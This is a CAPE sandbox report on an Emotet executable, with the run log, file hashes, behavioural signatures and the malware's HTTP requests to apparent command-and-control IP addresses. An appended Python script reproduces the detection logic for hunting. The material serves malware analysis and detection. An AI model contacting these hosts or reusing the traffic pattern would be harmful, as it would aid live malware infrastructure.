CAPE

Detections: Emotet


Analysis

Category  Package  Started              Completed            Duration
FILE      Emotet   2019-05-16 02:17:55  2019-05-16 02:22:01  246 seconds

Options
route = internet
procdump = 1

Log
2019-05-16 03:17:56,015 [root] INFO: Date set to: 05-16-19, time set to: 02:17:56, timeout set to: 200
2019-05-16 03:17:56,140 [root] DEBUG: Starting analyzer from: C:\zvxmavoi
2019-05-16 03:17:56,140 [root] DEBUG: Storing results at: C:\YmvQWhNsc
2019-05-16 03:17:56,140 [root] DEBUG: Pipe server name: \\.\PIPE\mJNEPd
2019-05-16 03:17:56,140 [root] INFO: Analysis package "Emotet" has been specified.
2019-05-16 03:18:01,148 [root] DEBUG: Started auxiliary module Browser
2019-05-16 03:18:01,148 [root] DEBUG: Started auxiliary module Curtain
2019-05-16 03:18:01,148 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-05-16 03:18:03,970 [modules.auxiliary.digisig] DEBUG: File is not signed.
2019-05-16 03:18:03,970 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-05-16 03:18:03,970 [root] DEBUG: Started auxiliary module DigiSig
2019-05-16 03:18:03,986 [root] DEBUG: Started auxiliary module Disguise
2019-05-16 03:18:03,986 [root] DEBUG: Started auxiliary module Human
2019-05-16 03:18:03,986 [root] DEBUG: Started auxiliary module Screenshots
2019-05-16 03:18:04,002 [root] DEBUG: Started auxiliary module Sysmon
2019-05-16 03:18:04,002 [root] DEBUG: Started auxiliary module Usage
2019-05-16 03:18:04,002 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Emotet
2019-05-16 03:18:04,017 [root] INFO: Analyzer: Package modules.packages.Emotet does not specify a DLL_64 option
2019-05-16 03:18:04,065 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\elVqUs.exe" with arguments "" with pid 2008
2019-05-16 03:18:04,065 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-16 03:18:04,065 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:04,065 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:04,065 [lib.api.process] INFO: 32-bit DLL to inject is C:\zvxmavoi\dll\AyRigGp.dll, loader C:\zvxmavoi\bin\PrGiMZq.exe
2019-05-16 03:18:04,095 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:04,095 [root] DEBUG: Loader: Injecting process 2008 (thread 2092) with C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:04,095 [root] DEBUG: Process image base: 0x00400000
2019-05-16 03:18:04,095 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:04,111 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00415000 - 0x77380000
2019-05-16 03:18:04,111 [root] DEBUG: InjectDllViaIAT: Allocated 0x1a0 bytes for new import table at 0x00420000.
2019-05-16 03:18:04,111 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-16 03:18:04,111 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:04,111 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2008
2019-05-16 03:18:06,124 [lib.api.process] INFO: Successfully resumed process with pid 2008
2019-05-16 03:18:06,124 [root] INFO: Added new process to list with pid: 2008
2019-05-16 03:18:06,513 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77380000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x773d124a, Wow64PrepareForException: 0x0
2019-05-16 03:18:06,513 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x230000
2019-05-16 03:18:06,513 [root] DEBUG: CAPE initialised (32-bit).
2019-05-16 03:18:06,592 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,592 [root] INFO: Monitor successfully loaded in process with pid 2008.
2019-05-16 03:18:06,592 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,592 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,592 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,732 [root] DEBUG: ProtectionHandler: Address: 0x401000, RegionSize: 0xd000
2019-05-16 03:18:06,732 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40e000.
2019-05-16 03:18:06,732 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-05-16 03:18:06,732 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-05-16 03:18:06,747 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-05-16 03:18:06,747 [root] DEBUG: DumpProcess: Module entry point VA is 0x40c9a0
2019-05-16 03:18:06,763 [root] INFO: Added new CAPE file to list with path: C:\zvxmavoi\CAPE\2008_748658316452019
2019-05-16 03:18:06,763 [root] DEBUG: DumpProcess: Module image dump success
2019-05-16 03:18:06,763 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-05-16 03:18:06,763 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40e000.
2019-05-16 03:18:06,763 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-05-16 03:18:06,872 [root] INFO: Announced 32-bit process name: elVqUs.exe pid: 2972
2019-05-16 03:18:06,872 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-16 03:18:06,872 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:06,872 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:06,872 [lib.api.process] INFO: 32-bit DLL to inject is C:\zvxmavoi\dll\AyRigGp.dll, loader C:\zvxmavoi\bin\PrGiMZq.exe
2019-05-16 03:18:06,888 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:06,888 [root] DEBUG: Loader: Injecting process 2972 (thread 1948) with C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:06,888 [root] DEBUG: Process image base: 0x00400000
2019-05-16 03:18:06,888 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:06,888 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00415000 - 0x77380000
2019-05-16 03:18:06,904 [root] DEBUG: InjectDllViaIAT: Allocated 0x1a0 bytes for new import table at 0x00420000.
2019-05-16 03:18:06,904 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-16 03:18:06,904 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:06,904 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2972
2019-05-16 03:18:06,920 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77380000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x773d124a, Wow64PrepareForException: 0x0
2019-05-16 03:18:06,920 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1c0000
2019-05-16 03:18:06,920 [root] DEBUG: CAPE initialised (32-bit).
2019-05-16 03:18:06,920 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:06,934 [root] INFO: Added new process to list with pid: 2972
2019-05-16 03:18:06,934 [root] INFO: Monitor successfully loaded in process with pid 2972.
2019-05-16 03:18:06,950 [root] INFO: Notified of termination of process with pid 2008.
2019-05-16 03:18:07,013 [root] DEBUG: ProtectionHandler: Address: 0x401000, RegionSize: 0xd000
2019-05-16 03:18:07,013 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40e000.
2019-05-16 03:18:07,029 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-05-16 03:18:07,043 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-05-16 03:18:07,043 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-05-16 03:18:07,043 [root] DEBUG: DumpProcess: Module entry point VA is 0x40c9a0
2019-05-16 03:18:07,059 [root] INFO: Added new CAPE file to list with path: C:\zvxmavoi\CAPE\2972_44758316452019
2019-05-16 03:18:07,091 [root] DEBUG: DumpProcess: Module image dump success
2019-05-16 03:18:07,091 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-05-16 03:18:07,091 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40e000.
2019-05-16 03:18:07,107 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-05-16 03:18:07,138 [root] INFO: Process with pid 2008 has terminated
2019-05-16 03:18:13,221 [root] INFO: Announced starting service "gluerel"
2019-05-16 03:18:13,221 [root] INFO: Attaching to Service Control Manager (services.exe - pid 460)
2019-05-16 03:18:13,221 [lib.api.process] DEBUG: Using CreateRemoteThread injection.
2019-05-16 03:18:13,237 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:13,237 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:13,237 [lib.api.process] INFO: 64-bit DLL to inject is C:\zvxmavoi\dll\zHuNXGll.dll, loader C:\zvxmavoi\bin\IvOoxoLc.exe
2019-05-16 03:18:13,253 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:13,269 [root] DEBUG: Loader: Injecting process 460 (thread 0) with C:\zvxmavoi\dll\zHuNXGll.dll.
2019-05-16 03:18:13,269 [root] DEBUG: InjectDll: No thread ID supplied, GetProcessInitialThreadId failed.
2019-05-16 03:18:13,283 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-05-16 03:18:13,299 [root] DEBUG: Process dumps enabled.
2019-05-16 03:18:13,315 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:13,346 [root] WARNING: Unable to place hook on LockResource
2019-05-16 03:18:13,346 [root] WARNING: Unable to hook LockResource
2019-05-16 03:18:13,378 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 460 at 0x0000000074420000, image base 0x00000000FFAB0000, stack from 0x0000000001286000-0x0000000001290000
2019-05-16 03:18:13,394 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2019-05-16 03:18:13,408 [root] INFO: Added new process to list with pid: 460
2019-05-16 03:18:13,408 [root] INFO: Monitor successfully loaded in process with pid 460.
2019-05-16 03:18:13,424 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2019-05-16 03:18:13,424 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2019-05-16 03:18:13,424 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\zHuNXGll.dll.
2019-05-16 03:18:14,500 [root] INFO: Announced 32-bit process name: gluerel.exe pid: 1088
2019-05-16 03:18:14,500 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-16 03:18:14,516 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:14,516 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:14,516 [lib.api.process] INFO: 32-bit DLL to inject is C:\zvxmavoi\dll\AyRigGp.dll, loader C:\zvxmavoi\bin\PrGiMZq.exe
2019-05-16 03:18:14,532 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:14,548 [root] DEBUG: Loader: Injecting process 1088 (thread 2380) with C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,548 [root] DEBUG: Process image base: 0x00400000
2019-05-16 03:18:14,548 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,548 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00415000 - 0x77380000
2019-05-16 03:18:14,563 [root] DEBUG: InjectDllViaIAT: Allocated 0x1a0 bytes for new import table at 0x00420000.
2019-05-16 03:18:14,578 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-16 03:18:14,595 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,595 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1088
2019-05-16 03:18:14,609 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77380000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x773d124a, Wow64PrepareForException: 0x0
2019-05-16 03:18:14,625 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x230000
2019-05-16 03:18:14,625 [root] DEBUG: CAPE initialised (32-bit).
2019-05-16 03:18:14,657 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:14,673 [root] INFO: Added new process to list with pid: 1088
2019-05-16 03:18:14,673 [root] INFO: Monitor successfully loaded in process with pid 1088.
2019-05-16 03:18:14,703 [root] DEBUG: ProtectionHandler: Address: 0x401000, RegionSize: 0xd000
2019-05-16 03:18:14,720 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40e000.
2019-05-16 03:18:14,734 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-05-16 03:18:14,734 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-05-16 03:18:14,734 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-05-16 03:18:14,734 [root] DEBUG: DumpProcess: Module entry point VA is 0x40c9a0
2019-05-16 03:18:14,734 [root] INFO: Added new CAPE file to list with path: C:\zvxmavoi\CAPE\1088_7351458316452019
2019-05-16 03:18:14,734 [root] DEBUG: DumpProcess: Module image dump success
2019-05-16 03:18:14,750 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-05-16 03:18:14,750 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40e000.
2019-05-16 03:18:14,750 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-05-16 03:18:14,766 [root] INFO: Announced 32-bit process name: gluerel.exe pid: 2444
2019-05-16 03:18:14,766 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-05-16 03:18:14,782 [lib.api.process] INFO: Option 'exclude-apis' with value 'RegOpenKeyExA' sent to monitor
2019-05-16 03:18:14,782 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-05-16 03:18:14,782 [lib.api.process] INFO: 32-bit DLL to inject is C:\zvxmavoi\dll\AyRigGp.dll, loader C:\zvxmavoi\bin\PrGiMZq.exe
2019-05-16 03:18:14,812 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mJNEPd.
2019-05-16 03:18:14,812 [root] DEBUG: Loader: Injecting process 2444 (thread 2068) with C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,828 [root] DEBUG: Process image base: 0x00400000
2019-05-16 03:18:14,828 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,828 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00415000 - 0x77380000
2019-05-16 03:18:14,828 [root] DEBUG: InjectDllViaIAT: Allocated 0x1a0 bytes for new import table at 0x00420000.
2019-05-16 03:18:14,844 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-05-16 03:18:14,844 [root] DEBUG: Successfully injected DLL C:\zvxmavoi\dll\AyRigGp.dll.
2019-05-16 03:18:14,844 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2444
2019-05-16 03:18:14,844 [root] INFO: Notified of termination of process with pid 1088.
2019-05-16 03:18:14,844 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77380000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x773d124a, Wow64PrepareForException: 0x0
2019-05-16 03:18:14,844 [root] WARNING: Unable to open termination event for pid 1088.
2019-05-16 03:18:14,844 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1c0000
2019-05-16 03:18:14,844 [root] DEBUG: CAPE initialised (32-bit).
2019-05-16 03:18:14,844 [root] INFO: Notified of termination of process with pid 2972.
2019-05-16 03:18:14,844 [root] INFO: Disabling sleep skipping.
2019-05-16 03:18:14,859 [root] INFO: Added new process to list with pid: 2444
2019-05-16 03:18:14,859 [root] INFO: Monitor successfully loaded in process with pid 2444.
2019-05-16 03:18:14,891 [root] DEBUG: ProtectionHandler: Address: 0x401000, RegionSize: 0xd000
2019-05-16 03:18:14,891 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40e000.
2019-05-16 03:18:14,891 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-05-16 03:18:14,891 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-05-16 03:18:14,891 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-05-16 03:18:14,891 [root] DEBUG: DumpProcess: Module entry point VA is 0x40c9a0
2019-05-16 03:18:14,907 [root] INFO: Added new CAPE file to list with path: C:\zvxmavoi\CAPE\2444_9071458316452019
2019-05-16 03:18:14,907 [root] DEBUG: DumpProcess: Module image dump success
2019-05-16 03:18:14,907 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-05-16 03:18:14,907 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40e000.
2019-05-16 03:18:14,921 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-05-16 03:18:15,250 [root] INFO: Process with pid 2972 has terminated
2019-05-16 03:18:15,250 [root] INFO: Process with pid 1088 has terminated
2019-05-16 03:21:34,072 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-05-16 03:21:34,072 [root] INFO: Created shutdown mutex.
2019-05-16 03:21:35,085 [root] INFO: Setting terminate event for process 2444.
2019-05-16 03:21:35,085 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2444
2019-05-16 03:21:35,085 [root] INFO: Terminating process 2444 before shutdown.
2019-05-16 03:21:35,085 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:36,099 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:37,114 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:38,128 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:39,141 [lib.api.process] INFO: Successfully terminated process with pid 2444.
2019-05-16 03:21:39,141 [root] INFO: Waiting for process 2444 to exit.
2019-05-16 03:21:40,155 [root] INFO: Shutting down package.
2019-05-16 03:21:40,155 [root] INFO: Stopping auxiliary modules.
2019-05-16 03:21:40,155 [root] INFO: Finishing auxiliary modules.
2019-05-16 03:21:40,155 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-05-16 03:21:40,155 [root] WARNING: File at path "C:\YmvQWhNsc\debugger" does not exist, skip.
2019-05-16 03:21:40,155 [root] INFO: Analysis completed.

MalScore

10.0

Emotet

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-05-16 02:17:55 2019-05-16 02:21:59

File Details

File Name emotet_exe_e2_4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2_2019-05-15__203502.ex
File Size 76800 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 e6794e6260d39e25db2f04af257acc3f
SHA1 eabc4ee8576f54f4dcde5f6133e926f21ac5c44a
SHA256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
SHA512 85134592c7b930639f9cdacf71c6910efccb86920ba1f42169c823b0066afb3248e4fe7e02bdf801d54052c75801e8077a33ba15c59d5277ad2190e031a9f947
CRC32 8CA4A6EF
Ssdeep 1536:DXgQIKlOUcKXCNUheD3fhNiuGnhzGYXgAq1oaW:D3sUtyNUhelGhaM
TrID
  • 38.3% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 26.2% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 11.8% (.EXE) OS/2 Executable (generic) (2029/13)
  • 11.6% (.EXE) Generic Win/DOS Executable (2002/3)
  • 11.6% (.EXE) DOS Executable Generic (2000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 2008 triggered the Yara rule 'Emotet'
Possible date expiration check, exits too soon after checking local time
process: gluerel.exe, PID 1088
Mimics the system's user agent string for its own requests
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ADVAPI32.dll/OpenThreadToken
DynamicLoader: propsys.dll/PSLookupPropertyHandlerCLSID
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: propsys.dll/PSCreatePropertyStoreFromObject
DynamicLoader: propsys.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToStringAlloc
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: propsys.dll/PropVariantToBuffer
DynamicLoader: propsys.dll/PropVariantToUInt64
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: propsys.dll/InitPropVariantFromBuffer
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/TreeSetNamedSecurityInfoW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureW
Performs HTTP requests potentially not found in PCAP.
url: 75.177.169.225:80/entries/xian/
url: 78.188.7.213:8090/schema/schema/
url: 207.44.45.27:22/publish/badge/forced/merge/
url: 138.68.13.161:8080/xian/
url: 138.68.13.161:8080/loadan/
url: 138.68.13.161:8080/pdf/devices/symbols/merge/
url: 138.68.13.161:8080/vermont/publish/
url: 90.57.69.215:80/stubs/forced/
url: 191.92.69.115:80/results/report/forced/merge/
Repeatedly searches for a not-found process, may want to run with startbrowser=1 option
Multiple direct IP connections
direct_ip_connections: Made direct connections to 6 unique IP addresses
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://138.68.13.161:8080/xian/
suspicious_request: http://138.68.13.161:8080/loadan/
suspicious_request: http://138.68.13.161:8080/pdf/devices/symbols/merge/
suspicious_request: http://138.68.13.161:8080/vermont/publish/
suspicious_request: http://138.68.13.161:8080/results/sess/
Performs some HTTP requests
url: http://138.68.13.161:8080/xian/
url: http://138.68.13.161:8080/loadan/
url: http://138.68.13.161:8080/pdf/devices/symbols/merge/
url: http://138.68.13.161:8080/vermont/publish/
url: http://138.68.13.161:8080/results/sess/
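Added example, not part of the CAPE report or of CAPE's own signature code: the checks behind the three network signatures above (direct IP connections, HTTP to a literal IP, and the per-host list of URI paths the implant rotates through) written as one stand-alone function over the request list shown on this page. The input list is copied from the signature output above; the port policy (only 80 and 443 count as ordinary HTTP ports) is an assumption of this example, chosen so that 8090, 22 and 8080 are called out separately from the bare fact that the host is an IP.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed input: the request list as reported in the signature output on this page.
# A real run would feed in the "http" entries of CAPE's report.json instead.
OBSERVED_URLS = [
    "75.177.169.225:80/entries/xian/",
    "78.188.7.213:8090/schema/schema/",
    "207.44.45.27:22/publish/badge/forced/merge/",
    "138.68.13.161:8080/xian/",
    "138.68.13.161:8080/loadan/",
    "138.68.13.161:8080/pdf/devices/symbols/merge/",
    "138.68.13.161:8080/vermont/publish/",
    "138.68.13.161:8080/results/sess/",
    "90.57.69.215:80/stubs/forced/",
    "191.92.69.115:80/results/report/forced/merge/",
]

# Assumption of this example: plain HTTP on any other port is worth its own flag.
STANDARD_HTTP_PORTS = {80, 443}


def parse_request(url):
    """Split a CAPE-style 'host:port/path' or a full URL into (host, port, path)."""
    if "://" not in url:
        url = "http://" + url          # CAPE omits the scheme in some signature lists
    parts = urlsplit(url)
    default = 443 if parts.scheme == "https" else 80
    return parts.hostname, parts.port or default, parts.path


def is_literal_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse_http(urls):
    """Reproduce the ip_hostname / direct_ip_connections logic and add a
    per-host view of the URI paths used against each C2 address."""
    direct_ips, findings, paths_by_host = set(), [], {}
    for url in urls:
        host, port, path = parse_request(url)
        reasons = []
        if is_literal_ip(host):
            direct_ips.add(host)
            reasons.append("ip_hostname")
        if port not in STANDARD_HTTP_PORTS:
            reasons.append(f"nonstandard_port:{port}")
        paths_by_host.setdefault(host, set()).add(path)
        if reasons:
            findings.append((url, reasons))
    return {
        "direct_ip_count": len(direct_ips),
        "direct_ips": sorted(direct_ips, key=ipaddress.ip_address),
        "findings": findings,
        "paths_by_host": paths_by_host,
    }


if __name__ == "__main__":
    result = analyse_http(OBSERVED_URLS)
    print(f"direct connections to {result['direct_ip_count']} unique IPs")
    for url, reasons in result["findings"]:
        print(f"  {url:50s} {','.join(reasons)}")
    for host, paths in result["paths_by_host"].items():
        if len(paths) > 1:
            print(f"  {host} was contacted on {len(paths)} distinct URI paths")
```

On the list above this reports six unique addresses, the same count as the direct_ip_connections signature, and singles out 207.44.45.27:22 as HTTP on a port where no HTTP service is expected. The per-host path set is the part CAPE does not give you directly: the randomised-word paths against a single IP and port are the pattern to carry into a proxy or NetFlow hunt, since the individual paths will not repeat.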
The binary likely contains encrypted or compressed data.
